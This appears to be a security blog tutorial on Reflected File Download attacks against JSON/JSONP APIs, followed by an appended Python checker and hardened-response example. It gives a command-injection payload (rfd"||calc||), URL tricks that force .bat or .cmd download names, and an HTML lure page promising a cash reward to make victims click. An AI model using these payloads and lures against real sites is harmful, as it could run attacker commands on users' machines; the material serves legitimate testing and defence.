Reflected File Download (RFD) Vulnerability. What? How?

Johne Jacob
3 min read · Jun 14, 2018


What is Reflected File Download or RFD?

Reflected File Download (RFD) is an attack technique that can allow an attacker to gain complete control over a victim’s machine by making a file appear to be downloaded from a trusted domain (such as google.com or bing.com). The technique was discovered by Oren Hafif, a Trustwave SpiderLabs security researcher, in 2014.


Where to check?

JSON and JSONP APIs are the main places to check for RFD, since most modern web applications use them. With tools like Burp Suite or OWASP ZAP you can enumerate the candidate endpoints for testing.

Ex:

https://some.website.com/api/v1.0/get_user_profile

How to test?

RFD testing can be divided into three parts: Reflected, Filename & Download.

1. Reflected

Step 1

Validate the responses of the JSON/JSONP APIs and check whether any user input is reflected.

Ex: Request -

https://some.website.com/api/v1.0/get_user_profile

Response -

{
  "data": {
    "id": "1239985",
    "domain": "website.com",
    "ph": "6456787984",
    "first_name": "DemoTest",
    "last_name": "LastRFD",
    "version": "5"
  }
}

In the example you can see that first_name, last_name and ph are reflected in the JSON response.

Step 2

Now enter the RFD payload rfd"||calc|| into the first_name and last_name fields. Validate the JSON/JSONP response: if it is reflected back as rfd\"||calc|| then there is a possibility of RFD.

To verify it completely, copy and save the response as filename.bat and run it from a command prompt; you will see Windows Calculator pop up.

Ex Response:

{
  "data": {
    "id": "1239985",
    "domain": "website.com",
    "ph": "6456787984",
    "first_name": "rfd\"||calc||",
    "last_name": "rfd\"||calc||",
    "version": "5"
  }
}

So reflection is confirmed; now we need to exploit it.

2. Filename

This is the challenging part. If we open the JSON/JSONP API URL in IE 11, the response is downloaded as somefileName.json. The filename depends mainly on the HTTP Content-Disposition header and the URL.

To exploit this vulnerability, we need to change the file extension to .cmd, .bat or .exe so that the file gets executed. How?

Ex: Content-Disposition: attachment; filename="userprofile.json"

The file will be downloaded with the name given in the Content-Disposition header, so this cannot be exploited. We need to move on to the next possibility: a response without a Content-Disposition header.

In the absence of a filename attribute in the Content-Disposition response header, browsers are forced to determine the name of the downloaded file from the URL.

Ex: https://some.website.com/api/v1.0/get_user_profile is downloaded as

get_user_profile.json

We can influence this filename with the payloads below:

get_user_profile.bat

get_user_profile;setup.bat

get_user_profile/setup.bat

get_user_profile;/setup.bat

get_user_profile;/setup.bat;

3. Download

HTML Template:

<!DOCTYPE html>
<html>
<body>
<p>Click the Image and open the file: You will be rewarded with $800</p>
<a href="https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" download><img border="0" src="https://some.website.com/api/v1.0/get_user_profile/setup.cmd?" alt="8000 Dollars" width="104" height="142"></a>
</body>
</html>

Open the HTML page and click the image; the file will be downloaded as setup.cmd.


How to fix this?

  • Use the Content-Disposition header to force the filename.
  • Use CSRF tokens.
  • Implement security headers for all APIs.
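The following is an added example, not code from the original post: a defender-side check that takes a captured API response and reports the RFD preconditions described in Steps 1 and 2 (shell metacharacters reflected through JSON escaping) and in the Filename section (no filename pinned by Content-Disposition, no nosniff header), together with a hardened response builder that applies the fixes listed above. All headers, bodies and the filename value are constructed for this example; the assumed nosniff check comes from the "security headers" fix and is not spelled out on the page.

```python
"""Added example (not from the original post): check one API response for the
RFD preconditions discussed above and show a hardened response builder.
Every header, body and filename below is constructed for illustration."""
import json
import re
from typing import Dict, List, Tuple

# JSON escaping turns " into \" but leaves | & ; untouched, so a reflected
# value such as  rfd\"||calc||  is still read by cmd.exe as command
# separators once the response is saved as a .bat/.cmd file.
SHELL_META = re.compile(r'[|&;]')


def assess_rfd(headers: Dict[str, str], body: str, user_value: str) -> List[str]:
    """Return findings for one API response; an empty list means none."""
    h = {k.lower(): v for k, v in headers.items()}
    findings: List[str] = []

    # 1. Filename: without a filename= attribute the browser derives the
    #    download name from the URL, which the attacker controls.
    if not re.search(r'filename\*?=', h.get("content-disposition", ""), re.I):
        findings.append("Content-Disposition has no filename; browser uses the URL")

    # 2. Sniffing: nosniff keeps the browser from treating the body as
    #    anything other than the declared JSON type.
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        findings.append("X-Content-Type-Options: nosniff is missing")

    # 3. Reflection: look for the value both raw and as JSON would escape it.
    escaped = json.dumps(user_value)[1:-1]
    if (user_value in body or escaped in body) and SHELL_META.search(user_value):
        findings.append("shell metacharacters from user input are reflected")
    return findings


def strip_shell_meta(value: str) -> str:
    """Drop characters cmd.exe treats as separators before a field is reflected.
    Extra defensive layer assumed here; the post's fix list is header-based."""
    return SHELL_META.sub("", value).replace('"', "")


def hardened_json_response(payload: dict,
                           filename: str = "response.json") -> Tuple[Dict[str, str], str]:
    """Serialize payload with headers that pin the download name and type.
    The filename value is a placeholder chosen for this example."""
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "X-Content-Type-Options": "nosniff",
    }
    return headers, json.dumps(payload)


# Constructed sample mirroring the post's Step 2 response.
PAYLOAD = 'rfd"||calc||'
VULN_HEADERS = {"Content-Type": "application/json"}
VULN_BODY = json.dumps({"data": {"id": "1239985", "first_name": PAYLOAD}})

if __name__ == "__main__":
    for finding in assess_rfd(VULN_HEADERS, VULN_BODY, PAYLOAD):
        print("finding:", finding)
    safe = strip_shell_meta(PAYLOAD)
    hdrs, body = hardened_json_response({"data": {"first_name": safe}})
    print("after hardening:", assess_rfd(hdrs, body, safe) or "no findings")
```

Run against the constructed Step 2 response the checker reports all three preconditions; with the pinned filename and nosniff header only the reflection finding remains, which shows why the header fix alone stops the download trick but not the reflection itself.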

References:

https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/

Johne Jacob

Security Engineer | Bug Hunter | Mobile & Web Automation Tester | Security Researcher | Splunk Certified User | RPA Certified Developer